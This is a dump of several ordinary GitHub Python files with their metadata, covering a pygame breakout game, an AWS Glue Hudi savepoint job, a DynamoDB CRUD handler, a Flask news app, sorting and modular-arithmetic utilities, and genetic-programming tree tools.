self.bricklength\r\n\r\n\r\ndef main():\r\n \r\n #inizializzo variabili per la bara, punteggio \r\n xspeed = 4\r\n yspeed = 4\r\n max_lives = 5\r\n bat_speed = 10\r\n score = 0 \r\n bgcolour = 13, 124, 112\r\n txtcolour = 9, 9, 9\r\n \r\n size = width, height = 640, 480\r\n\r\n pygame.init() \r\n screen = pygame.display.set_mode(size) #per finestra\r\n #screen = pygame.display.set_mode(size, pygame.FULLSCREEN)#per gioco in fullscreen\r\n #carica l'immagine della paletta\r\n bat = pygame.image.load(\"bat.png\") \r\n batrect = bat.get_rect()\r\n #carica l'immagine della pallina\r\n ball = pygame.image.load(\"ball.png\") \r\n ball.set_colorkey((255, 255, 255)) \r\n ballrect = ball.get_rect()\r\n \r\n\r\n #richiamo le funzioni per la costruzione e la distruzione del muro\r\n wall = Wall() #distruggere\r\n wall.build_wall(width) #muro\r\n\r\n batrect = batrect.move((width / 2) - (batrect.right / 2), height - 20)\r\n ballrect = ballrect.move(width / 2, height / 2) \r\n lives = max_lives\r\n clock = pygame.time.Clock()\r\n #pygame.key.set_repeat(1,30) nn dovrebbe servire cancellare \r\n pygame.mouse.set_visible(0)\r\n\r\n #menu \r\n tasto = \"p\"\r\n while True:\r\n #fin che non si preme P non parte il gioco.\r\n if tasto == \"p\":\r\n while keyboard.is_pressed(\"p\") == False:\r\n screen.blit(SFONDO_MENU, (0,0))\r\n pygame.display.flip()\r\n tasto = \"y\"\r\n \r\n\r\n clock.tick(60)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n\r\n acc = q.get()\r\n #if per capire in che senso è inclinato il microbit, <150 andrà a sinistra, >150 andrà a destra\r\n if (acc[0] < -150):#sinistra\r\n batrect = batrect.move(-bat_speed, 0)\r\n screen.blit(bat, batrect)\r\n elif (acc[0] > 150):#destra\r\n batrect = batrect.move(+bat_speed, 0)\r\n screen.blit(bat, batrect)\r\n q.task_done()\r\n\r\n #controlllo del muro sia a destra che a sinistra\r\n if (batrect.left < 0): \r\n batrect.left = 0\r\n if (batrect.right > 640):\r\n batrect.right = 640\r\n\r\n #se la palla ha toccato la piattaforma la fa rimbalzare \r\n if ballrect.bottom >= batrect.top and ballrect.bottom <= batrect.bottom and ballrect.right >= batrect.left and ballrect.left <= batrect.right:\r\n yspeed = -yspeed \r\n \r\n #muove con la velocità\r\n ballrect = ballrect.move(xspeed, yspeed) \r\n if ballrect.left < 0 or ballrect.right > width:\r\n #modifica la velocità x facendola 
rimbalzare\r\n xspeed = -xspeed \r\n if ballrect.top < 0:\r\n yspeed = -yspeed \r\n \r\n\r\n if ballrect.top > height:\r\n lives -= 1\r\n if score > 15:\r\n score -= 15\r\n rand = random.random() \r\n if random.random() > 0.5:\r\n xspeed = -xspeed \r\n ballrect.center = width * random.random(), height / 3 #centro della palla \r\n if lives == 0: \r\n screen.fill(bgcolour)\r\n screen.blit(GAME_OVER, (145, 50))\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 40)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(score), True, txtcolour)\r\n screen.blit(surf_txt_score, (260, 420))\r\n\r\n pygame.display.flip()\r\n\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n \r\n #controllo collisione con mattone\r\n index = ballrect.collidelist(wall.brickrect) \r\n if index != -1: \r\n #ogni 100pt la velocità della pallina e dalla barra aumenterà\r\n if finale == 100:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 0.7\r\n yspeed = abs(yspeed) + 0.7\r\n elif finale == 200:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 1\r\n yspeed = abs(yspeed) + 1\r\n elif finale == 300:\r\n bat_speed += 2\r\n xspeed = abs(xspeed) + 0.7\r\n yspeed = abs(yspeed) + 0.7\r\n \r\n #controllo collisione e modifica rimbalzo\r\n if ballrect.center[0] > wall.brickrect[index].right or \\\r\n ballrect.center[0] < wall.brickrect[index].left: \r\n\r\n xspeed = -xspeed\r\n else:\r\n yspeed = -yspeed \r\n #+10pt ad ogni mattoncino rotto\r\n wall.brickrect[index:index + 1] = []\r\n score += 10 \r\n\r\n \r\n #stampa punteggio\r\n finale = score*lives#moltiplica il punteggio dei mattoncini con la vita \r\n screen.fill(bgcolour)\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 30)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(finale), True, txtcolour)\r\n screen.blit(surf_txt_score, (450, 10))\r\n\r\n \r\n\r\n #stampa vite\r\n fnt_lives = pygame.font.SysFont(\"inkfree\", 30)\r\n surf_txt_lives = fnt_lives.render(\"Lives: \" + str(lives), True, txtcolour)\r\n screen.blit(surf_txt_lives, (20, 10))\r\n\r\n for i in range(0, len(wall.brickrect)):\r\n screen.blit(wall.brick, wall.brickrect[i]) \r\n\r\n #controllo del muro, se non c'è si ha vinto\r\n if wall.brickrect == []: \r\n screen.fill(bgcolour)\r\n screen.blit(WIN, (130, 50))\r\n fnt_score = pygame.font.SysFont(\"inkfree\", 40)\r\n surf_txt_score = fnt_score.render(\"Score: \" + str(finale), True, txtcolour)\r\n screen.blit(surf_txt_score, (260, 390))\r\n\r\n pygame.display.flip()\r\n \r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n rm.terminate()\r\n rm.join()\r\n pygame.quit()\r\n sys.exit()\r\n \r\n screen.blit(ball, ballrect)\r\n screen.blit(bat, batrect)\r\n pygame.display.flip()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n rm = Read_Microbit()\r\n rm.start()\r\n pygame.init()\r\n main()\r\n ","repo_name":"NicoCavaa/TPSIT2020-2021","sub_path":"PongBreak/PongBreak.py","file_name":"PongBreak.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37453067398","text":"try:\n import sys\n from pyspark.context import SparkContext\n from 
pyspark.sql.session import SparkSession\n from awsglue.context import GlueContext\n from awsglue.job import Job\n from awsglue.dynamicframe import DynamicFrame\n from pyspark.sql.functions import col, to_timestamp, monotonically_increasing_id, to_date, when\n from pyspark.sql.functions import *\n from awsglue.utils import getResolvedOptions\n from pyspark.sql.types import *\n from datetime import datetime, date\n import boto3\n from functools import reduce\n from pyspark.sql import Row\n\n import uuid\n from faker import Faker\nexcept Exception as e:\n print(\"Modules are missing : {} \".format(e))\n\n# Get command-line arguments\nargs = getResolvedOptions(\n sys.argv, [\n 'JOB_NAME',\n 'GLUE_DATABASE',\n 'GLUE_TABLE_NAME'\n ],\n)\n\nspark = (SparkSession.builder.config('spark.serializer', 'org.apache.spark.serializer.KryoSerializer') \\\n .config('spark.sql.hive.convertMetastoreParquet', 'false') \\\n .config('spark.sql.catalog.spark_catalog', 'org.apache.spark.sql.hudi.catalog.HoodieCatalog') \\\n .config('spark.sql.extensions', 'org.apache.spark.sql.hudi.HoodieSparkSessionExtension') \\\n .config('spark.sql.legacy.pathOptionBehavior.enabled', 'true').getOrCreate())\n\n# Create a Spark context and Glue context\nsc = spark.sparkContext\nglueContext = GlueContext(sc)\njob = Job(glueContext)\nlogger = glueContext.get_logger()\njob.init(args[\"JOB_NAME\"], args)\n\ndb_name = args['GLUE_DATABASE']\ntable_name = args['GLUE_TABLE_NAME']\n\nquery_show_commits = f\"call show_commits('{db_name}.{table_name}', 5)\"\nspark_df_commits = spark.sql(query_show_commits)\ncommits = list(map(lambda row: row[0], spark_df_commits.collect()))\n\nquery_save_point = f\"call create_savepoint('{db_name}.{table_name}', '{commits[0]}')\"\nexecute_save_point = spark.sql(query_save_point)\n\nshow_check_points_query = f\"call show_savepoints('{db_name}.{table_name}')\"\nshow_check_points_query_df = spark.sql(show_check_points_query)\n\nprint(f\"\"\"\n**************************STATS**********************************\nquery {query_show_commits}\nspark_df {spark_df_commits.show()}\ncommits {commits}\nLatest commit: {commits[0]}\n\n########################### Save Points ##########################\nquery: {query_save_point}\nsave_point {execute_save_point.show()}\n\n##################### ###### SHOW CHECK POINT ######################\nquery: {show_check_points_query}\nshow_check_points_query_df {show_check_points_query_df.show()}\n*********************************************************************\n\"\"\")\n","repo_name":"nfarah86/aws-hudi-ride-share-workshop","sub_path":"infrastructure/GLueJobs/save_points.py","file_name":"save_points.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"71183835970","text":"import sys\ninput = sys.stdin.readline\nt = int(input()) \nfor _ in range(t):\n n = int(input())\n l = list(map(int, input().rstrip().split()))\n l.sort()\n MIN = l[0]\n for i in range(1, n):\n MIN = max(MIN, l[i]-l[i-1])\n print(MIN)","repo_name":"kimjngyun/cofo","sub_path":"Rounds/R753D3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2962710448","text":"import boto3\nfrom decouple import config\n\n#import the credentials to our python file\nAWS_ACCESS_KEY_ID = config(\"AWS_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = config(\"AWS_SECRET_ACCESS_KEY\")\nREGION_NAME = 
config(\"REGION_NAME\")\n\n#Set Client and Resource\nclient = boto3.client(\n 'dynamodb',\n aws_access_key_id = AWS_ACCESS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_ACCESS_KEY,\n region_name = REGION_NAME,\n)\nresource = boto3.resource(\n 'dynamodb',\n aws_access_key_id = AWS_ACCESS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_ACCESS_KEY,\n region_name = REGION_NAME,\n)\n\n#instantiate table in dynamo\nProduct_Table = resource.Table('products')\n\n\n\n#POST method\ndef add_product(id, name, price):\n response = Product_Table.put_item(\n Item = {\n 'id' : id,\n 'name' : name,\n 'price' : price,\n }\n )\n return response\n \n#GET method\ndef get_product(id):\n response = Product_Table.get_item(\n Key = {\n 'id' : id\n },\n AttributesToGet=[\n 'name', \n 'price'\n ]\n )\n return response\n \n#PUT method\ndef update_product(id, data:dict):\n response = Product_Table.update_item(\n Key = {\n 'id': id\n },\n AttributeUpdates={\n 'name': {\n 'Value' : data['name'],\n 'Action' : 'PUT' \n },\n 'price': {\n 'Value' : data['price'],\n 'Action' : 'PUT'\n }\n },\n ReturnValues = \"UPDATED_NEW\" \n )\n return response\n\n#DELETE method\ndef delete_product(id):\n response = Product_Table.delete_item(\n Key = {\n 'id': id\n }\n )\n return response","repo_name":"AsaelSolorio/AWS-lambda-Api-serverless","sub_path":"dynamodb_handler.py","file_name":"dynamodb_handler.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43847404445","text":"from urllib.request import Request\nfrom flask import render_template,request,redirect,url_for\nfrom . import main\nfrom ..models import Source, Article\nfrom ..requests import get_sources, get_source, get_topheadlines\nfrom app import requests\n\n# Views\n@main.route('/', methods=[\"POST\", \"GET\"])\ndef index():\n '''\n View root page function that returns the index page and its data\n '''\n \n news_sources = get_sources()\n\n \n title = 'Home - News Sources'\n\n if request.method==\"POST\":\n search = request.form['article_query']\n search = search.replace(\" \", '-');\n trending = get_topheadlines(search)\n return render_template('index.html', title = title, sources = news_sources, trending=trending)\n else:\n search='kenya'\n trending = get_topheadlines(search)\n return render_template('index.html', title = title, sources = news_sources, trending=trending)\n\n \n \n\n@main.route('/source/')\ndef source(id):\n '''\n View source page function that returns the news_sourcesindex page and its data\n '''\n news_sources = get_sources()\n source_details = get_source(id)\n title = 'Source - '+id\n source = id.upper()\n\n return render_template('source.html',sources = news_sources, source=source, source_details=source_details)\n\n\n@main.route('/404')\ndef article():\n '''\n View source page function that returns the index page and its data\n '''\n return render_template('404.html')","repo_name":"k-koech/flask_newsAPI","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13521439362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 3 22:47:55 2020\n\n@author: Do Quang Tuan\n\"\"\"\nfrom modular.extendedGCD import extendedGCD\nfrom prime.isPrime import isPrime\n\ndef modularInverse(a, n):\n assert(extendedGCD(a, n) == 1)\n \n s = 0\n t = 1\n r = n \n old_s = 1\n old_t = 0\n old_r = a\n \n while r != 0:\n quotient = 
old_r // r\n        old_r, r = r, old_r - quotient * r\n        old_s, s = s, old_s - quotient * s\n        old_t, t = t, old_t - quotient * t\n        \n    if old_s < 0:\n        old_s = n + old_s\n        \n    return old_s","repo_name":"dqtuan99/information-security","sub_path":"modular/modularInverse.py","file_name":"modularInverse.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22441366295","text":"class MergeSort:\n    \"\"\"Merge sort implementation.\"\"\"\n\n    def __init__(self, a_list):\n        \"\"\"Initializing the list\"\"\"\n        self.a_list = a_list\n\n    def sort(self, a_list=None):\n        \"\"\"Merge sort follows the divide and conquer strategy and is among the\n        best performing comparison-based sorting algorithms. The time\n        complexity is O(n log n), unlike quick sort whose time complexity\n        fluctuates because of pivot element selection.\n\n        The drawback with the below implementation is that it uses additional\n        storage while dividing and merging.\n\n        :param a_list- The list to be sorted. If the list is not passed in\n        as an argument, the instance's own list is used\n        :returns - Sorted List\n        \"\"\"\n        a_list = self.a_list if a_list is None else a_list\n\n        if len(a_list) > 1:\n            middle = len(a_list) // 2\n\n            left = a_list[:middle]\n            right = a_list[middle:]\n            self.sort(left)\n            self.sort(right)\n\n            i, j, k = 0, 0, 0\n\n            while i < len(left) and j < len(right):\n                if left[i] < right[j]:\n                    a_list[k] = left[i]\n                    i += 1\n                else:\n                    a_list[k] = right[j]\n                    j += 1\n                k += 1\n\n            while i < len(left):\n                a_list[k] = left[i]\n                i += 1\n                k += 1\n\n            while j < len(right):\n                a_list[k] = right[j]\n                j += 1\n                k += 1\n\n        return a_list\n\n\n    def better_sort(self, first, last):\n        \"\"\"In-place merge sort over a_list[first..last] (inclusive indices).\"\"\"\n        if first < last:\n            middle = (first + last) // 2\n            self.better_sort(first, middle)\n            self.better_sort(middle + 1, last)\n            self.merge(first, middle, last)\n        return self.a_list\n\n    def merge(self, first, middle, last):\n        \"\"\"Merge the sorted runs a_list[first..middle] and a_list[middle+1..last].\"\"\"\n        merged = []\n        i, j = first, middle + 1\n        while i <= middle and j <= last:\n            if self.a_list[i] <= self.a_list[j]:\n                merged.append(self.a_list[i])\n                i += 1\n            else:\n                merged.append(self.a_list[j])\n                j += 1\n        merged.extend(self.a_list[i:middle + 1])\n        merged.extend(self.a_list[j:last + 1])\n        self.a_list[first:last + 1] = merged","repo_name":"Sriee/epi","sub_path":"data_structures/sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"538450171","text":"#!/usr/bin/env python\n\nimport re\nfrom math import sqrt\nimport numpy as np\nimport warnings\n\ndef latex_float(f):\n    float_str = \"{0:.2g}\".format(f)\n    if \"e\" in float_str:\n        base, exponent = float_str.split(\"e\")\n        return r\"{0} \\times 10^{{{1}}}\".format(base, int(exponent))\n    else:\n        return float_str\n\n\n# ---- Latex tools -----\n\ndef bracket_block(text):\n    \"\"\"\n    finds start and end of the first bracketed block\n    \"\"\"\n\n    istart=text.find('(')\n\n    cursor=istart\n\n    if cursor != -1:\n\n        counter=1\n        while (cursor<len(text)-1) and counter>0:\n            cursor+=1\n            if text[cursor]=='(':\n                counter += 1\n            elif text[cursor]==')':\n                counter -= 1 \n\n    return istart, cursor\n\n\ndef nw_split(text):\n    \n    istart,iend=bracket_block(text)\n    if istart == -1:\n        return text.split(',')\n    else:\n        # include the opcode at the end\n        result=[text[istart:iend+2],]\n\n        if iend<len(text)-2:\n            # text after the block may itself contain brackets, so split it recursively\n            result = result + nw_split(text[iend+3:])\n\n        if istart>0:\n            # preceding text does not contain brackets by construction\n            # so can be readily included without further special splitting\n            result = text[:istart-1].split(',') + result\n\n        return result\n\n\n\ndef node2Latex(node, index_start=1):\n\n\n    pieces = {}\n    output = '**** LATEX *******\\n\\n'\n    \n    for i, child in enumerate(node.children):\n        output += '$ \\\\dot{S_%d} = %s $ \\\\newline \\\\newline \\n'%(i+1,child.to_latex())\n\n\n\n    return output\n\n\ndef newick2Latex(text, index_start=1, SPACEDIM=2):\n\n    try:
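\n        # [editor's note] parsing the whole tree first lets SPACEDIM be inferred from the number of top-level children; the except branch keeps the default dimension when the Newick string cannot be parsed.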
\n        node=Node.from_newick(text)\n        SPACEDIM = len(node.children)\n    except:\n        warnings.warn('Tree cannot be parsed using Node.from_newick. Leaving SPACEDIM = %d'%SPACEDIM)\n        SPACEDIM = 2\n\n\n    if ' ' in text:\n        raise ValueError(\"No spaces allowed in tree string %s\"%text)\n\n    pieces = {}\n    output = '**** LATEX *******\\n\\n'\n    \n    output += '$ \\\\dot{S} = %s $ \\\\newline \\\\newline \\n'%newick2human(text,pieces, index_start=index_start, SPACEDIM=SPACEDIM)\n\n    coef_list = sorted(pieces.items())\n\n    # list coefficients (constants) in Latex\n    for coef_tuple in coef_list:\n        output += '$ %s = %s $ \\\\newline \\n'%(coef_tuple[0],coef_tuple[1])\n\n\n    output += '\\n**** END LATEX *******\\n\\n'\n\n    # list them again for copy paste into Python\n    for coef_tuple in coef_list:\n        output += '%s = %s\\n'%(coef_tuple[0],coef_tuple[1])\n\n\n    return output\n\ndef newick2human(text, pieces = None, SPACEDIM=2, index_start=1,dtype=float):\n\n    strings = {'V':'[' + ',\\n '.join(['%s']*SPACEDIM) + ']','A':'%s + %s','S':'%s - %s','M':'(%s) (%s)','D':'(%s) / (%s)','Q': '\\sqrt{%s}','I':'%s $ for $ %s>0 $ and $ %s $ otherwise $ ', 'T':'tanh(%s)'}\n\n    leaf_ops = {'Q':'\\sqrt','E':'e','O':'1/','T':'tanh','L':'log'}\n\n    if pieces is None:\n        pieces = {}\n\n    if '(' in text:\n        opcode = text[-1]\n        childrentext = text[1:-2]\n\n        childtexts = nw_split(childrentext)\n\n        if (opcode == 'Q') and ('(' not in childtexts[0]) and ('p' not in childtexts[0]):\n            newvarname='c_%d'%len([el for el in pieces if 'c' in el])\n            pieces[newvarname] = '%.2e'%sqrt(dtype(childtexts[0]))\n            return newvarname\n#        print strings[opcode]\n#        print tuple([newick2human(ct) for ct in childtexts])\n\n        if (opcode == 'I'):\n#            print [el for el in pieces if 'a' in el], len([el for el in pieces if 'a' in el])\n            newvarname='a_%d'%len([el for el in pieces if 'a' in el])\n            pieces[newvarname] = 'placeholder'\n\n            pieces[newvarname] = strings[opcode]%tuple([newick2human(text=ct,pieces=pieces,SPACEDIM=SPACEDIM, index_start=index_start,dtype=dtype) for ct in [childtexts[1], childtexts[0],childtexts[2] ] ])\n\n            return newvarname\n\n        return strings[opcode]%tuple([newick2human(text=ct,pieces=pieces,SPACEDIM=SPACEDIM, index_start=index_start,dtype=dtype) for ct in childtexts])\n\n    else:\n        \n        if text in leaf_ops:\n            return leaf_ops[text]\n\n        if 'p' in text:\n            if text[1:] in [str(e) for e in range(SPACEDIM)]:\n                return 'S_%d'%(int(text[1:])+index_start)\n            else:\n                return 'f_%d'%(int(text[1:])-SPACEDIM+index_start)\n        else:\n            newvarname='c_%d'%(len([el for el in pieces if 'c' in el])+index_start)\n            pieces[newvarname] = '%.5e'%dtype(text)\n            return newvarname\n\n# -------- end Latex tools -----\n\n\ndef parse_params_tree_str(tree_str, dtype=float):\n\n    S_init_array = None\n    scalars = None\n\n    tree_str = re.sub('\\s+',' ',tree_str).strip()\n\n    L = tree_str.split(\" \")\n    \n    if L:\n        tree = L.pop()\n    else:\n        raise Exception(\"Provide at least a tree string.\")\n\n    if L:\n        S_init_array = np.array( [dtype(e) for e in L.pop().strip(\"()\").split(\",\") ] )\n\n    if L:\n        scalars = np.array( [dtype(e) for e in L.pop().strip(\"()\").split(\",\") ] )\n\n    return (tree, S_init_array, scalars )\n    \n\ndef protected_mem(i,numpar,spacedim=6):\n    # clamp a write index so the first spacedim state slots and the special\n    # registers at the top of the register file are never overwritten\n    if i<spacedim:\n        i=spacedim\n\n    if (i>numpar-7):\n        i=numpar-7\n\n    return i\n\n\ndef nopFun(reg):\n    return 0\n\ndef addFun(reg,x,y):\n\n    return x + y\n\ndef subFun(reg,x,y):\n\n    return x - y\n\ndef mulFun(reg,x,y):\n\n    return x * y\n\ndef ifFun(reg,x,y,z):\n\n    if (x>0):\n        return y\n    else:\n        return z\n\ndef isgreaterFun(reg,x,y):\n\n    if (x>y):\n        return 1\n    else:\n        return 0
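\n\n\n# [editor's note] every opcode handler below follows the same convention as addFun/subFun above: the first argument is the register file 'reg', and the dedicated index register lives at reg[len(reg)-6]. As a purely illustrative, hypothetical call (not from the original code), funcs['A'](reg, 2, 3) dispatches the add opcode and returns 5 without touching reg.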
\ndef iseqFun(reg, x,y):\n\n    if (x==y):\n        return 1\n    else:\n        return 0\n\n\ndef copyFun(reg,x,y):\n\n    reg[protected_mem(x,len(reg))] = reg[y%len(reg)] \n\n    return x\n\ndef storeFun(reg,x,y):\n\n    reg[protected_mem(y,len(reg))] = x\n\n    return x\n\ndef ldaFun(reg,x):\n\n    return reg[x%len(reg)] \n\n\ndef lda_xFun(reg,x):\n\n    return reg[(x+reg[len(reg)-6])%len(reg)] \n\ndef ldxFun(reg, x,y):\n\n    reg[len(reg)-6] = reg[y%len(reg)] \n\n    return x\n\ndef sta_xFun(reg,x,y):\n\n    reg[protected_mem(y+reg[len(reg)-6],len(reg))] = x\n\n    return x\n\ndef stxFun(reg,x,y):\n\n    reg[protected_mem(y,len(reg))] = reg[len(reg)-6] \n\n    return x\n\ndef inxFun(reg,x):\n\n    reg[len(reg)-6] += 1\n#    if (reg[len(reg)-6] >= len(reg)):\n#        reg[len(reg)-6] -= len(reg)\n\n    reg[len(reg)-6] = reg[len(reg)-6]%len(reg)\n\n    return x\n\ndef dexFun(reg,x):\n\n    reg[len(reg)-6] -= 1\n    #clamp the index register at zero once it would go negative\n    if (reg[len(reg)-6] < 0):\n        reg[len(reg)-6] = 0\n\n    return x\n\n\ndef reverse_sign(op_sign):\n    \n    if (op_sign == '+'):\n        \n        return '-'\n    else:\n        return '+'\n\nfuncs = {'A':addFun, 'S':subFun,'M':mulFun,'I':ifFun, 'G':isgreaterFun, 'E':iseqFun, 'N':copyFun,'R':storeFun,\n         'L':ldaFun, 'l':lda_xFun, 'X':ldxFun, 's':sta_xFun, 'x':stxFun, 'i':inxFun, 'd':dexFun}\n\n\nadditive = {'A':'+','S':'-'}\nmultiplicative = {'M':'','S':'/'}\n\nfunctions = {'T':'tanh(%s)','Q':'\\sqrt(%s)'}\n\n\nclass Node(object):\n\n\n#    strings = {'V':'[' + ', '.join(['%s']*SPACEDIM) + ']','A':'%s + %s','S':'%s - %s','M':'(%s) (%s)','D':'(%s) / (%s)','Q': '\\sqrt{%s}','I':'%s $ for $ %s>0 $ and $ %s $ otherwise $ ', 'T':'tanh(%s)'}\n\n#    leaf_ops = {'Q':'\\sqrt','E':'e','O':'1/','T':'tanh','L':'log'}\n\n\n\n\n\n\n    def __repr__(self):\n        return self.op\n\n    def __init__(self,op,children=[], op_table = {'A':'+'}): \n\n        self.op = op\n        self.children = children\n\n\n    def __call__(self, reg):\n        return funcs[self.op](reg,*[c(reg) for c in self.children])\n\n    @classmethod\n    def from_newick(cls,text,dtype=float):\n\n        if '(' in text:\n            opcode = text[-1]\n            childrentext = text[1:-2]\n\n            childtexts = nw_split(childrentext)\n            \n            return cls(opcode, [cls.from_newick(ct,dtype=dtype) for ct in childtexts])\n        else:\n            if 'p' in text:\n                return ParamNode(int(text[1:]))\n            elif 'T' in text:\n                return Node(text,[])\n            else:\n                return ConstNode(dtype(text))\n\n    def walk(self,indent=0):\n\n        print (' '*indent) + self.__repr__()\n        for c in self.children:\n            c.walk(indent+1)\n\n\n    def mbrack(self):\n\n        if self.op in functions:\n            return self.to_latex()\n\n        if self.__class__ is TermNode:\n            return self.to_latex()\n\n        if self.children:\n            return '(%s)'%self.to_latex()\n        else:\n            return self.to_latex()\n\n\n    def to_latex(self):\n\n        \n        if self.op in additive:\n            op_sign = additive[self.op]\n#            if isinstance(self.children[1],ConstNode):\n#                if (self.children[1].value < 0):\n#                    op_sign = reverse_sign(op_sign)\n\n            return ' '.join([self.children[0].to_latex(), op_sign , self.children[1].to_latex() ] ).replace('+ -','- ')\n        elif self.op in multiplicative:\n            return ' '.join([self.children[0].mbrack(), multiplicative[self.op] , self.children[1].mbrack() ] )\n        elif self.op in functions:\n            return functions[self.op]%self.children[0].to_latex()\n        else:\n            return '%s'%self\n\n\n    def is_equal(self, other):\n\n        if (self.op != other.op):\n            return False\n\n        elif (len(self.children) > 0):\n            return reduce( lambda x,y: x and y, [e.is_equal(other.children[i]) for i, e in enumerate(self.children) ] )\n        else:\n\n            return True\n\n\n    def distance(self, other, d=0):\n\n        if (other is None):\n\n            d += 1 \n            for c in self.children:\n                d = c.distance(None,d)
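\n\n            # an absent subtree is charged one unit per node: each recursive call with other=None adds 1 for every descendant before the total is returned\n            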
return d\n\n\n if (self.op != other.op):\n d += 1\n\n if (len(other.children) > len(self.children) ):\n left = other\n right = self\n\n else:\n left = self\n right = other \n\n m = min( len(left.children), len(right.children) )\n \n for i in range(m):\n\n d = left.children[i].distance(right.children[i],d)\n\n for i in range( len(left.children) -m ):\n d = left.children[i].distance(None,d)\n\n return d\n\n\nclass TermNode(Node):\n \"\"\"\n Terminal node\n \"\"\"\n\n def distance(self, other, d=0):\n\n if (other is None):\n \n return d+1\n\n elif (not isinstance(other,self.__class__)):\n\n d += 1 # account for node\n\n for e in other.children:\n d = e.distance(None,d)\n\n elif not self.is_equal(other):\n d += 1\n\n return d\n\nclass ParamNode(TermNode):\n\n\n def __repr__(self):\n return \"S_%d\"%(self.index+1)\n\n def __init__(self,index ): \n\n self.op = 'P'\n self.children = []\n self.index = index;\n\n def __call__(self, reg):\n\n try:\n return reg[self.index]\n except:\n raise Exception(\"error fetching p node: index=%d vs len(reg)=%d\\n\"%(self.index,len(reg)))\n\n\n def is_equal(self, other):\n\n return isinstance(other,self.__class__) and (self.index == other.index)\n\n\n\nclass ConstNode(TermNode):\n\n def __repr__(self, dtype=float):\n if dtype is float:\n return latex_float(self.value)\n else:\n return '%d'%self.value\n\n def __init__(self,value ): \n\n self.op = 'C'\n self.children = []\n self.value = value;\n\n def __call__(self, reg):\n return self.value\n\n def is_equal(self, other):\n\n return isinstance(other,self.__class__) and (self.value == other.value)\n\n\n","repo_name":"wsijp/NextGen-GP","sub_path":"treetools.py","file_name":"treetools.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33231373361","text":"#!/bin/python3\n\nfrom gpiozero import LED\nfrom time import sleep\n\n\nLED_GPIO = 19\nPERIOD = 1\n\nif __name__ == \"__main__\":\n led = LED(LED_GPIO)\n while True:\n led.on()\n sleep(PERIOD)\n led.off()\n sleep(PERIOD)\n","repo_name":"ENACRobotique/robot_rpi_2023","sub_path":"services/heartbeat.py","file_name":"heartbeat.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33230749284","text":"import numpy as np\nfrom tabulate import tabulate\nimport copy\n\nfrom perceval.utils.format import simple_float\nfrom perceval.utils.statevector import BasicState\n\n\nclass CircuitAnalyser:\n def __init__(self, simulator, input_states, output_states=None, mapping=None, post_select_fn=None):\n \"\"\"\n Initialization of Circuit Analyzer\n `simulator` is a simulator instance initialized for the circuit\n `input_states` is a list of FockStates or a mapping fockstate => name\n `output_states` is a list of FockState or a mapping fockstate => name, if missing input is taken,\n if \"*\" all possible target states are generated\n `mapping` is a mapping of FockState => name for display\n `post_select_fn` is a post selection function\n \"\"\"\n self._simulator = simulator\n if mapping is None:\n self._mapping = {}\n else:\n self._mapping = mapping\n if isinstance(input_states, dict):\n self.input_states_list = []\n for k, v in input_states.items():\n self._mapping[k] = v\n self.input_states_list.append(k)\n else:\n self.input_states_list = input_states\n for input_state in self.input_states_list:\n assert isinstance(input_state, BasicState), \"input_states should be 
